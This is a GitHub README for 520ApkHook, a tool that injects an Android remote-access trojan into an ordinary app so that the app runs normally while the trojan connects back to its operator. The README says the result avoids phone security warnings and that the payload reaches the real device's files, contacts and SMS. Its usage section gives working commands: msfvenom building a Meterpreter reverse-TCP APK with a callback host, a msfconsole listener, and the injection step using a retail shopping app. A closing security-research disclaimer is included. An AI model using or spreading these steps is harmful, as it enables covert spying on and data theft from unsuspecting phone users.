/520apkhook

将安卓远控Apk附加进普通的App中,运行新生成的App时,普通App正常运行,远控正常上线。Attach the Android remote control APK to a regular app. When the newly generated app is launched, the regular app operates as normal while the remote control goes online seamlessly.

Primary LanguageJavaApache License 2.0Apache-2.0

520_APK_HOOK

介绍

  • 将编写的安卓远控程序,注入到正常的App中,运行app时安卓远控程序也会上线。

  • 修复上一版本的bug,使用java重写,同时还重写了520ApkBox程序,专门用来运行运行APP和远控App。

  • 520ApkBox是一个java编写的App,主要作用是一个安卓虚拟机,任何App可以不用任何修改就可以正常运行,可以绕过现在各种App的安全检测。同时此App还是一个加载器,通过DexClassesLoder加载远控的Dex文件并启动上线。

  • 520ApkHook是Java编写的注入工具,将被注入的App和远控App注入到一个App中。

  • 项目地址: https://github.com/ba0gu0/520apkhook

  • 作者: BaoGuo

版本升级

  • 2023-06-05

  • 上版本忘记添加32位app支持,此次升级加入32位app支持。更换了虚拟机项目依赖,稳定性更好一下。

  • 支持安卓5-12版本,不支持最新的安卓13。

  • 问题1、目前有问题的app,微信、ES文件浏览器。

  • 问题2、被注入的app读取到的文件、图片、通讯录、短信是虚拟机的内容,但是注入的payload获取到的是实体机的内容。

优点

  • 相比于普通的安卓远控,此版本app在进行远控时,被注入的app可以正常运行。

  • 注入后的app在安装时,手机管家不会有任何安全提示,普通的远控程序,安装时手机管家会有安全警示。

  • 理论上来说,只要远控软件使用的是纯Java或者Kotlin编写,就可以使用,不一定必须是msf生成的apk。

使用

  1. 下载Releases中打包好的jar包
  1. msfmsfvenom
msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk
  1. msfconsole
# 启动 msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3306
set exitonsession false
exploit -j
  1. 520ApkHook
java -jar a520ApkHook-1.0-jar-with-dependencies.jar  ~/Downloads/京东.apk ~/Downloads/msf.apk
  1. BaoGuo仍给你一个Apk,请安装它!

搭配其他远控使用

BUG

  • 微信、ES文件浏览器只能通过应用克隆的方式安装,需要先指定微信的apk包,生成520ApkHook.apk. 再使用np管理器把assets目录下的和对应apk大小一样的文件给删除掉。再使用np管理器重新进行签名即可.(这种方法要求目标机器上要已经安装微信.)

  • 新生成的apk的包名字, 不能和被注入的apk包名字一样, 程序默认已经修改.

  • msf无法在鸿蒙OS使用, 文件读取在鸿蒙OS上也无法正常使用.

  • 其他未测试...

项目依赖

  • 本项目参考以下项目

  • 由于安卓虚拟化牵扯到其他github上被下架的程序,在这里不再进行列出,避免被影响。

重点说明

  • 本项目仅用于安全研究, 禁止利用脚本进行攻击, 使用本脚本产生的一切问题和本人无关.

  • 由于此软件是基于安卓虚拟化来实现的,虚拟化软件对于不同版本的系统会出现BUG,可以自行修改520ApkBox项目源码 (欢迎大佬提交pull) .

Start 曲线

Start 曲线